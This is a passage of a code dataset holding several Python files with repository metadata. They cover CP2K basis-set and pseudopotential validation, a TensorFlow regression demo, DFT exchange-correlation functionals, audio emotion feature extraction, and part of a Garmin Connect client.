gdt_instance.name)\n\n if identifier in identifiers:\n # note: this should be possible for basissets with different versions\n # but at this point we should require some format for the key to match it\n return f\"{attr} for kind {gdt_instance.element} ({gdt_instance.name}) specified multiple times\"\n\n identifiers += [identifier]\n\n return None\n\n\ndef _write_gdt(inp, entries, folder, key, fname):\n \"\"\"inject = into all FORCE_EVAL/DFT sections and write the entries to a file\"\"\"\n\n for secpath, section in inp.param_iter(sections=True):\n if secpath[-1].upper() == \"DFT\":\n section[key] = fname\n\n with open(folder.get_abs_path(fname), mode=\"w\", encoding=\"utf-8\") as fhandle:\n for _, entry in _unpack(entries):\n entry.to_cp2k(fhandle)\n\n\ndef validate_basissets_namespace(basissets, _):\n \"\"\"A input_namespace validator to ensure passed down basis sets have the correct type.\"\"\"\n return _validate_gdt_namespace(\n basissets, DataFactory(\"gaussian.basisset\"), \"basis set\"\n )\n\n\ndef validate_basissets(inp, basissets, structure):\n \"\"\"\n Verify that all referenced basissets are present in the input.\n Currently supports 2 modes: either all of the basisssets are explicitly\n listed in a KIND section, or none of them are, at which point they're\n verified against the symbols in the structure.\n \"\"\"\n\n # convert a structure\n # {\n # \"ORB_O\": [BasisSet<1>, BasisSet<2>],\n # \"AUX_O\": BasisSet<3>,\n # \"H\": BasisSet<4>,\n # }\n # into\n # [ (\"ORB\", \"O\", BasisSet<1>),\n # (\"ORB\", \"O\", BasisSet<2>),\n # (\"AUX\", \"O\", BasisSet<3>),\n # (\"ORB\", \"H\", BasisSet<4>) ]\n # e.g. resolving any label to a (type,label) tuple, and unpack any list of basissets\n basissets = [\n (*_parse_name(label, default_type=\"ORB\", sep=\"_\"), bset)\n for label, bset in _unpack(basissets)\n ]\n basissets_specified = {bset for _, _, bset in basissets}\n basissets_used = set()\n explicit_kinds = [] # list of kinds with explicitly specified kind sections\n\n for section in (\n section\n for secpath, section in inp.param_iter(sections=True)\n if secpath[-1].upper() == \"KIND\"\n ):\n kind, element = _kind_element_from_kind_section(section)\n explicit_kinds += [kind]\n\n try:\n bsnames = section[\"BASIS_SET\"]\n except KeyError:\n # if the BASIS_SET keyword is not present, try to look one up based on the given basissets\n bsets = [(t, b) for t, s, b in basissets if s == kind]\n\n # try again with lov.. with a chemical symbol\n if not bsets:\n bsets = [(t, b) for t, s, b in basissets if s == element]\n\n if not bsets:\n raise InputValidationError(\n f\"No basis set found for kind {kind} or element {element}\"\n f\" in basissets input namespace and not explicitly set.\"\n )\n\n if len(bsets) > 1:\n section[\"BASIS_SET\"] = [f\"bstype {bset.name}\" for bstype, bset in bsets]\n else:\n section[\"BASIS_SET\"] = f\"{bsets[0][0]} {bsets[0][1].name}\"\n\n basissets_used.update(bset for _, bset in bsets)\n else:\n # The keyword BASIS_SET can occur multiple times, even for the same type, in which case\n # the specified basis sets are merged (given they match the same type)\n if isinstance(bsnames, str):\n bsnames = [_parse_name(bsnames, \"ORB\")]\n else:\n bsnames = [_parse_name(bsname, \"ORB\") for bsname in bsnames]\n\n for bstype, bsname in bsnames:\n bsets = [(t, b) for t, s, b in basissets if s == kind]\n\n # try again with a chemical symbol\n if not bsets:\n bsets = [(t, b) for t, s, b in basissets if s == element]\n\n if not bsets:\n raise InputValidationError(\n f\"'BASIS_SET {bstype} {bsname}' for element {element} (from kind {kind})\"\n \" not found in basissets input namespace\"\n )\n\n for _, bset in bsets:\n if bsname in bset.aliases:\n basissets_used.add(bset)\n break\n else:\n raise InputValidationError(\n f\"'BASIS_SET {bstype} {bsname}' for element {element} (from kind {kind})\"\n \" not found in basissets input namespace\"\n )\n\n # if there is no structure and there are any unreferenced basissets, end it here\n if not structure and any(\n bset not in basissets_used for bset in basissets_specified\n ):\n raise InputValidationError(\n \"No explicit structure given and basis sets not referenced in input\"\n )\n\n if isinstance(inp[\"FORCE_EVAL\"], Sequence) and any(\n kind.name not in explicit_kinds for kind in structure.kinds\n ):\n raise InputValidationError(\n \"Automated BASIS_SET keyword creation is not yet supported with multiple FORCE_EVALs.\"\n \" Please explicitly reference a BASIS_SET for each KIND.\"\n )\n\n # check the structure against the present KIND sections and generate the missing ones\n for kind in structure.kinds:\n if kind.name in explicit_kinds:\n # nothing to do if the user already specified a KIND section for this KIND\n continue\n\n # the user can specify multiple types and even multiple basissets for the same KIND or ELEMENT\n # Try to find all of them by matching KIND name\n\n bsets = [(t, b) for t, s, b in basissets if s == kind.name]\n\n # if that returned none, try matching by chemical symbol/element again:\n if not bsets:\n bsets = [(t, b) for t, s, b in basissets if s == kind.symbol]\n\n if not bsets:\n raise InputValidationError(\n f\"No basis set found in the given basissets for kind '{kind.name}' of your structure.\"\n )\n\n for _, bset in bsets:\n if bset.element != kind.symbol:\n raise InputValidationError(\n f\"Basis set '{bset.name}' for '{bset.element}' specified\"\n f\" for kind '{kind.name}' (of '{kind.symbol}').\"\n )\n\n kind_section = _prepare_kind_section(inp, kind)\n if len(bsets) > 1:\n kind_section[\"BASIS_SET\"] = [\n f\"{bstype} {bset.name}\" for bstype, bset in bsets\n ]\n else:\n kind_section[\"BASIS_SET\"] = f\"{bsets[0][0]} {bsets[0][1].name}\"\n\n explicit_kinds += [kind.name]\n basissets_used.update(bset for _, bset in bsets)\n\n for bset in basissets_specified:\n if bset not in basissets_used:\n raise InputValidationError(\n f\"Basis set '{bset.name}' ('{bset.element}') specified in the basissets\"\n f\" input namespace but not referenced by either input or structure.\"\n )\n\n\ndef write_basissets(inp, basissets, folder):\n \"\"\"Writes the unified BASIS_SETS file with the used basissets\"\"\"\n _write_gdt(inp, basissets, folder, \"BASIS_SET_FILE_NAME\", \"BASIS_SETS\")\n\n\ndef validate_pseudos_namespace(pseudos, _):\n \"\"\"A input_namespace validator to ensure passed down pseudopentials have the correct type.\"\"\"\n return _validate_gdt_namespace(pseudos, DataFactory(\"gaussian.pseudo\"), \"pseudo\")\n\n\ndef validate_pseudos(inp, pseudos, structure):\n \"\"\"Verify that all referenced pseudos are present in the input\"\"\"\n\n pseudos_specified = {pseudo for _, pseudo in _unpack(pseudos)}\n pseudos_used = set()\n explicit_kinds = [] # list of kinds with explicitly specified kind sections\n\n for section in (\n section\n for secpath, section in inp.param_iter(sections=True)\n if secpath[-1].upper() == \"KIND\"\n ):\n kind, element = _kind_element_from_kind_section(section)\n explicit_kinds += [kind]\n\n try:\n pname = section[\"POTENTIAL\"]\n except KeyError:\n # if the POTENTIAL keyword is not present, try to look one up based on given pseudos\n try:\n # first try with the KIND since this is the most specific one\n # NOTE: compared to basissets it doesn't make sense for the user to specify the type\n # since the type of a pseudo can not be chosen (it is either an GTH, ECP, STO, etc.)\n pseudo = pseudos[kind]\n except KeyError:\n try:\n pseudo = pseudos[element]\n except KeyError:\n raise InputValidationError(\n f\"No pseudopotential found for kind {kind} or element {element}\"\n f\" in pseudos input namespace and not explicitly set.\"\n )\n\n # if the POTENTIAL keyword is missing completely, fill it up:\n section[\"POTENTIAL\"] = f\"GTH {pseudo.name}\"\n else:\n ptype, pname = _parse_name(pname, \"GTH\")\n\n try:\n # first try with the KIND since this is the most specific one\n pseudo = pseudos[kind]\n except KeyError:\n try:\n pseudo = pseudos[element]\n except KeyError:\n raise InputValidationError(\n f\"'POTENTIAL {ptype} {pname}' for element {element} (from kind {kind})\"\n \" not found in pseudos input namespace\"\n )\n\n if pname not in pseudo.aliases:\n raise InputValidationError(\n f\"'POTENTIAL {ptype} {pname}' for element {element} (from kind {kind})\"\n \" not found in pseudos input namespace\"\n )\n\n if pseudo.element != element:\n raise InputValidationError(\n f\"Pseudopotential '{pseudo.name}' for '{pseudo.element}' specified\"\n f\" for element '{element}'.\"\n )\n\n pseudos_used.add(pseudo)\n\n # if there is no structure and there are any unreferenced pseudos, end it here\n if not structure and any(\n pseudo not in pseudos_used for pseudo in pseudos_specified\n ):\n raise InputValidationError(\n \"No explicit structure given and pseudo not referenced in input\"\n )\n\n if isinstance(inp[\"FORCE_EVAL\"], Sequence) and any(\n kind.name not in explicit_kinds for kind in structure.kinds\n ):\n raise InputValidationError(\n \"Automated POTENTIAL keyword creation is not yet supported with multiple FORCE_EVALs.\"\n \" Please explicitly reference a POTENTIAL for each KIND.\"\n )\n\n # check the structure against the present KIND sections and generate the missing ones\n for kind in structure.kinds:\n if kind.name in explicit_kinds:\n # nothing to do if the user already specified a KIND section for this KIND\n continue\n\n try:\n pseudo = pseudos[kind.name]\n except KeyError:\n # if that returned none, try matching by chemical symbol/element again:\n try:\n pseudo = pseudos[kind.symbol]\n except KeyError:\n raise InputValidationError(\n f\"No basis set found in the given basissets\"\n f\" for kind '{kind.name}' (or '{kind.symbol}') of your structure.\"\n )\n\n if pseudo.element != kind.symbol:\n raise InputValidationError(\n f\"Pseudopotential '{pseudo.name}' for '{pseudo.element}' specified\"\n f\" for kind '{kind.name}' (of '{kind.symbol}').\"\n )\n\n kind_section = _prepare_kind_section(inp, kind)\n kind_section[\"POTENTIAL\"] = f\"GTH {pseudo.name}\"\n\n explicit_kinds += [kind.name]\n pseudos_used.add(pseudo)\n\n for pseudo in pseudos_specified:\n if pseudo not in pseudos_used:\n raise InputValidationError(\n f\"Pseudopodential '{pseudo.name}' specified in the pseudos input namespace\"\n f\" but not referenced by either input or structure.\"\n )\n\n\ndef write_pseudos(inp, pseudos, folder):\n \"\"\"Writes the unified POTENTIAL file with the used pseudos\"\"\"\n _write_gdt(inp, pseudos, folder, \"POTENTIAL_FILE_NAME\", \"POTENTIAL\")\n", "repo_name": "aiidateam/aiida-cp2k", "sub_path": "aiida_cp2k/utils/datatype_helpers.py", "file_name": "datatype_helpers.py", "file_ext": "py", "file_size_in_byte": 15104, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 20, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.abc.Sequence", "line_number": 12, "usage_type": "argument"}, {"api_name": "re.compile", "line_number": 33, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 33, "usage_type": "attribute"}, {"api_name": "aiida.common.InputValidationError", "line_number": 45, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 55, "usage_type": "call"}, {"api_name": "aiida.plugins.DataFactory", "line_number": 120, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 171, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 198, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 208, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 217, "usage_type": "call"}, {"api_name": "collections.abc.Sequence", "line_number": 221, "usage_type": "argument"}, {"api_name": "aiida.common.InputValidationError", "line_number": 224, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 245, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 251, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 269, "usage_type": "call"}, {"api_name": "aiida.plugins.DataFactory", "line_number": 282, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 313, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 330, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 336, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 342, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 353, "usage_type": "call"}, {"api_name": "collections.abc.Sequence", "line_number": 357, "usage_type": "argument"}, {"api_name": "aiida.common.InputValidationError", "line_number": 360, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 378, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 384, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 397, "usage_type": "call"}]} +{"seq_id": "19629310943", "text": "import numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n \nnum_points = 1000\nvectors_set = []\nfor i in range (num_points):\n x1 = np.random.normal (0.0, 0.6)\n y1 = x1*0.5+0.3+np.random.normal(0.0,0.3)\n vectors_set.append([x1,y1])\nx_data = [v[0] for v in vectors_set]\ny_data = [v[1] for v in vectors_set]\n# display\nplt.scatter (x_data,y_data, c='r')\nplt.show()\n\n#生成w,1 维的矩阵,取值[-1,1] 之间的随机数,b 常数\nW = tf.Variable(tf.random_uniform([1],-1.0,1.0),name='W')\nb = tf.Variable(tf.zeros([1]),name='b')\ny = W * x_data + b\n\n# 以预测值 y 和实际值之间的均方差作为损失\nloss = tf.reduce_mean(tf.square(y-y_data),name='loss')\n# 采用梯度下降来优化参数\noptimizer = tf.train.GradientDescentOptimizer(0.5)\ntrain = optimizer.minimize(loss,name='train')\nepochs = 100\nwith tf.Session() as sess:\n init = tf.global_variables_initializer()\n sess.run(init)\n print ('W=', sess.run(W), 'b=', sess.run(b),'loss=', sess.run(loss))\n \n for seg in range (epochs):\n sess.run(train)\n print ('W=', sess.run(W), 'b=', sess.run(b),'loss=', sess.run(loss))\n \n print ('W=', sess.run(W), 'b=', sess.run(b),'loss=', sess.run(loss)) \n plt.scatter(x_data, y_data, c='r')\n plt.plot(x_data,sess.run(W)*x_data+sess.run(b))\nplt.show()", "repo_name": "LeiWang1999/AICS-Course", "sub_path": "Code/4.10.logicregression.tensorflow.py", "file_name": "4.10.logicregression.tensorflow.py", "file_ext": "py", "file_size_in_byte": 1309, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 133, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.random.normal", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 8, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 9, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "tensorflow.Variable", "line_number": 18, "usage_type": "call"}, {"api_name": "tensorflow.random_uniform", "line_number": 18, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 19, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 19, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.square", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.train.GradientDescentOptimizer", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 25, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}]} +{"seq_id": "71483612354", "text": "\"\"\"\nimplementation of LDA XC-functionals\n\"\"\"\nfrom numpy import sqrt, exp, log, pi, linspace, arctan\n\nclass XC_None:\n def __init__(self):\n pass\n def setGrid(self, x):\n # GGA potentials need to know the grid in order\n # to differentiate\n self.x = x \n def vxc(self,n):\n return 0.0*n\n\n#### LOCAL DENSITY APPROXIMATION ##############################\n\nclass XC_PW92(XC_None):\n def __init__(self):\n \"\"\" The Perdew-Wang 1992 LDA exchange-correlation functional. \"\"\"\n self.small=1E-90\n self.a1 = 0.21370\n self.c0 = 0.031091\n self.c1 = 0.046644\n self.b1 = 1.0/2.0/self.c0*exp(-self.c1/2.0/self.c0)\n self.b2 = 2*self.c0*self.b1**2\n self.b3 = 1.6382\n self.b4 = 0.49294\n def exc(self,n,der=0):\n \"\"\" Exchange-correlation with electron density n. \"\"\"\n return self.e_x(n,der=der)+self.e_corr(n,der=der)\n\n def e_x(self,n,der=0):\n \"\"\" Exchange. \"\"\"\n if der==0:\n return -3.0/4*(3*n/pi)**(1.0/3)\n elif der==1:\n return -3.0/(4*pi)*(3*n/pi)**(-2.0/3)\n\n def e_corr(self,n,der=0):\n \"\"\" Correlation energy. \"\"\"\n rs = (3.0/(4*pi*n))**(1.0/3)\n aux=2*self.c0*( self.b1*sqrt(rs)+self.b2*rs+self.b3*rs**(3.0/2)+self.b4*rs**2 )\n if der==0:\n return -2*self.c0*(1+self.a1*rs)*log(1+aux**-1)\n elif der==1:\n return ( -2*self.c0*self.a1*log(1+aux**-1) \\\n -2*self.c0*(1+self.a1*rs)*(1+aux**-1)**-1*(-aux**-2)\\\n *2*self.c0*(self.b1/(2*sqrt(rs))+self.b2+3*self.b3*sqrt(rs)/2+2*self.b4*rs) )*( -(4*pi*n**2*rs**2)**-1 )\n\n def vxc(self,n):\n \"\"\" Exchange-correlation potential (functional derivative of exc). \"\"\"\n return self.exc(n)+n*self.exc(n,der=1)\n\nclass XC_VWN(XC_None): # not sure if this gives correct xc-potential\n \"\"\"\n Vosko, Wilk and Nusair XC functional as used by NIST's \"Atomic Reference Data\n for Electronic Structure Calculations\" for spin unpolarized densities\n\n see http://physics.nist.gov/PhysRefData/DFTdata/chap2.2.html#exchange\n \"\"\"\n def __init__(self):\n pass\n def __F(self, rs, A, x0, b, c):\n def X(x):\n return x**2+b*x+c\n x = sqrt(rs)\n Q = sqrt(4*c-b**2)\n aux = arctan(Q/(2*x+b))\n F = A*( log(x**2/X(x)) \\\n + 2*b/Q * aux \\\n - b*x0/X(x0) * ( log( pow(x-x0,2)/X(x) ) + 2*(b+2*x0)/Q * aux) )\n return F\n def __dF(self, rs, A, x0, b, c):\n \"\"\"\n derivative of F with respect to rs\n \"\"\"\n def X(x):\n return x**2+b*x+c\n def dX(x):\n return 2*x+b\n x = sqrt(rs)\n Q = sqrt(4*c-b**2)\n dx_drs = 1.0/(2.0*x)\n dF_dx = A*( 2.0/x - dX(x)/X(x) \\\n - 4.0*b/( pow(2*x+b,2) + Q**2 ) \\\n - b*x0/X(x0)* ( 2.0/(x-x0) - dX(x)/X(x) - 4.0*(b+2.0*x0)/(pow(2.0*x+b,2) + Q**2) ))\n return dF_dx * dx_drs\n def exc(self,n,der=0):\n \"\"\" Exchange-correlation with electron density n. \"\"\"\n return self.e_x(n,der=der)+self.e_corr(n,der=der)\n\n def e_x(self,n,der=0):\n \"\"\" Exchange. \"\"\"\n if der==0:\n return -3.0/4*(3*n/pi)**(1.0/3) # -3.0/2.0*pow(3*n/pi, 1.0/3) # NIST larger by factor of 2 !?\n elif der==1:\n return -3.0/(4*pi)*(3*n/pi)**(-2.0/3) # -3.0/(2*pi)*pow(3*n/pi, -2.0/3)\n\n def e_corr(self,n,der=0):\n \"\"\" Correlation energy. \"\"\"\n # paramagnetic\n A_p, x0_p, b_p, c_p = 0.0310907, -0.10498, 3.72744, 12.9352\n # electron gas parameter\n rs = pow(3.0/(4*pi*n), 1.0/3)\n \n if der==0:\n e_c = self.__F(rs, A_p, x0_p, b_p, c_p)\n return e_c\n elif der==1:\n dF_drs = self.__dF(rs, A_p, x0_p, b_p, c_p)\n drs_dn = -1.0/3.0 * pow(3.0/(4.0*pi), 1.0/3.0) * pow(n, -4.0/3.0)\n dec_dn = dF_drs * drs_dn\n return dec_dn \n\n def vxc(self,n):\n \"\"\" Exchange-correlation potential (functional derivative of exc). \"\"\"\n return self.exc(n)+n*self.exc(n,der=1)\n\n########### LIB-XC #####################\n\nfrom pylibxc.pylibxc import libXCFunctional\n\nif __name__ == \"__main__\":\n from matplotlib.pyplot import plot, show\n\n rs = linspace(0.1, 5.0, 2000)\n rho = 1.0/ ( 4.0/3.0*pi*pow(rs,3) )\n xcpot_pw92 = XC_PW92()\n plot(rho, xcpot_pw92.vxc(rho))\n\n xcpot_vwn = XC_VWN()\n plot(rho, xcpot_vwn.vxc(rho), \"o\")\n \n show()\n", "repo_name": "humeniuka/DFTBaby", "sub_path": "DFTB/SlaterKoster/XCFunctionals.py", "file_name": "XCFunctionals.py", "file_ext": "py", "file_size_in_byte": 4532, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.exp", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 36, "usage_type": "name"}, {"api_name": "numpy.pi", "line_number": 38, "usage_type": "name"}, {"api_name": "numpy.pi", "line_number": 42, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.arctan", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 96, "usage_type": "name"}, {"api_name": "numpy.pi", "line_number": 98, "usage_type": "name"}, {"api_name": "numpy.pi", "line_number": 105, "usage_type": "name"}, {"api_name": "numpy.pi", "line_number": 112, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 128, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 135, "usage_type": "call"}]} +{"seq_id": "27059279113", "text": "#! /usr/bin/python3\n\n\nimport numpy as np\nfrom scipy import signal\nimport librosa\n\n\n\ndef get_segment_features_from_file(filename, sample_rate=16000):\n\ty,_ = librosa.core.load(filename, sample_rate)\n\treturn get_segment_features(y, sample_rate)\n\n\ndef get_segment_features(y, sample_rate, frame_length=0.025, hop_length=0.010, frames_per_segment=25):\n\n\tframe_length_s = int(sample_rate * frame_length)\n\thop_length_s = int(sample_rate * hop_length)\n\t# print(\"frame_length_s:\", frame_length_s)\n\t# print(\"hop_length_s:\", hop_length_s)\n\n\tyt,_ = librosa.effects.trim(y, top_db=5)\n\t# print(\"Len: Original\", len(y), \"Trimmed\", len(yt))\n\n\t# Pad with zeros, to match behaviour of mfcc with yt while getting frames from yp\n\typ = np.concatenate([np.zeros(frame_length_s//2), yt, np.zeros(frame_length_s//2)]) \t\n\n\tframes = librosa.util.frame(yp,frame_length_s, hop_length_s)\n\tframes = frames.T\n\n\n\tmfcc = librosa.feature.mfcc(y=yt, sr=sample_rate, n_fft=frame_length_s, hop_length=hop_length_s)\t\n\tmfcc_d = librosa.feature.delta(mfcc)\n\tmfcc_dd = librosa.feature.delta(mfcc, order=2)\n\n\tframe_features_mfcc = mfcc.T\n\tframe_features_mfcc_d = mfcc_d.T\n\tframe_features_mfcc_dd = mfcc_dd.T\n\n\tthreshold = 0.015\n\t# threshold = 0.0\n\n\tframe_features_pitch = np.empty((0,2))\n\tfor frame in frames:\n\n\t\tif np.max(frame) < threshold or np.min(frame) > threshold:\n\t\t\tframe_features_pitch = np.vstack((frame_features_pitch, [np.nan, np.nan]))\n\t\t\tcontinue\n\n\t\tfeature_pitch_period = get_feature_pitch_period(frame, sample_rate)\n\t\tfeature_hnr = get_feature_hnr(frame, sample_rate, feature_pitch_period[0])\n\n\t\tfeature_pitch = np.concatenate([feature_pitch_period, feature_hnr])\n\t\tframe_features_pitch = np.vstack((frame_features_pitch, feature_pitch))\n\t# print(\"Num of frames:\", len(frame_features_pitch))\n\n\n\tframe_features = np.hstack((frame_features_pitch,frame_features_mfcc,frame_features_mfcc_d,frame_features_mfcc_dd))\n\n\t# Remove features of frames which were added by np.zeros()\n\tnum_frames_remove = np.ceil(frame_length_s/2/hop_length_s).astype(int)\n\tframe_features = frame_features[num_frames_remove:-num_frames_remove,:]\n\n\tsegment_features = np.empty((0, frame_features.shape[1]*frames_per_segment ))\n\tfor i in range(frames_per_segment//2, len(frame_features)-frames_per_segment//2):\n\t\tw = frames_per_segment//2\n\t\tfeature = np.ravel(frame_features[i-w:i-w+frames_per_segment])\n\n\t\t# Discrad invalid segment\n\t\tif np.isnan(feature).any():\n\t\t\tcontinue\n\n\t\tsegment_features = np.vstack((segment_features, feature))\n\n\t# print(\"Num of segments\", len(segment_features))\n\n\treturn segment_features\n\n\ndef get_feature_pitch_period(frame, sample_rate):\n\tcorr = np.correlate(frame, frame, \"same\")\n\tcorr = corr[len(corr)//2:]\n\n\tcorr_diff = np.diff(corr)\n\n\ttry:\n\t\tidx_low_first = np.where(corr_diff > 0)[0][0]\n\t\tidx_hi_second = np.argmax(corr[idx_low_first:]) + idx_low_first\n\texcept IndexError as e:\n\t\treturn [np.nan]\n\t\t# Noisy?\n\n\tpitch_period = sample_rate/idx_hi_second\n\n\treturn [pitch_period]\n\n\ndef get_feature_hnr(frame, sample_rate, pitch_period):\n\n\tif np.isnan(pitch_period):\n\t\treturn [np.nan]\n\n\tdef autocorr(frame,t):\n\t\treturn [np.corrcoef(frame[0:frame.size-t],frame[t:frame.size])[0,1]]\n\n\ttau = np.rint(sample_rate/pitch_period).astype(int)\n\n\ttry:\n\t\tacf_0 = np.abs(autocorr(frame,0))\n\t\tacf_tau = np.abs(autocorr(frame,tau))\n\t\thnr = 10*np.log(acf_tau/(acf_0 - acf_tau))\n\texcept ValueError as e:\n\t\thnr = [np.nan]\n\n\treturn hnr\n", "repo_name": "RohitG28/Audio-Emotion-Recognition", "sub_path": "src/seg_ftr_extraction.py", "file_name": "seg_ftr_extraction.py", "file_ext": "py", "file_size_in_byte": 3388, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "librosa.core.load", "line_number": 11, "usage_type": "call"}, {"api_name": "librosa.core", "line_number": 11, "usage_type": "attribute"}, {"api_name": "librosa.effects.trim", "line_number": 22, "usage_type": "call"}, {"api_name": "librosa.effects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 26, "usage_type": "call"}, {"api_name": "librosa.util.frame", "line_number": 28, "usage_type": "call"}, {"api_name": "librosa.util", "line_number": 28, "usage_type": "attribute"}, {"api_name": "librosa.feature.mfcc", "line_number": 32, "usage_type": "call"}, {"api_name": "librosa.feature", "line_number": 32, "usage_type": "attribute"}, {"api_name": "librosa.feature.delta", "line_number": 33, "usage_type": "call"}, {"api_name": "librosa.feature", "line_number": 33, "usage_type": "attribute"}, {"api_name": "librosa.feature.delta", "line_number": 34, "usage_type": "call"}, {"api_name": "librosa.feature", "line_number": 34, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.ravel", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.correlate", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 90, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 101, "usage_type": "attribute"}, {"api_name": "numpy.corrcoef", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.rint", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 113, "usage_type": "attribute"}]} +{"seq_id": "25238103516", "text": "\"\"\"Clients to help interface with various APIs used for collection.\"\"\"\n\nfrom random import randint\nfrom datetime import datetime\n\nfrom garminexport.garminclient import GarminClient, require_session\n\n\nclass UserGarminClient(GarminClient):\n \"\"\"Add the ability to get a daily activity report from the GarminExport project.\"\"\"\n @require_session\n def get_daily_report(self, token: str, day: datetime) -> dict:\n \"\"\"Download the daily activity report from Garmin using the built-in session capability.\n\n :param token: the Garmin API token\n :param day: the datetime to collect\n :returns: the response from Garmin\n\n \"\"\"\n day_string = day.isoformat().split('T')[0]\n cache_buster = randint(100000, 1000000)\n url = f'https://connect.garmin.com/modern/proxy/usersummary-service/usersummary/daily/{token}?calendarDate={day_string}&_={cache_buster}'\n 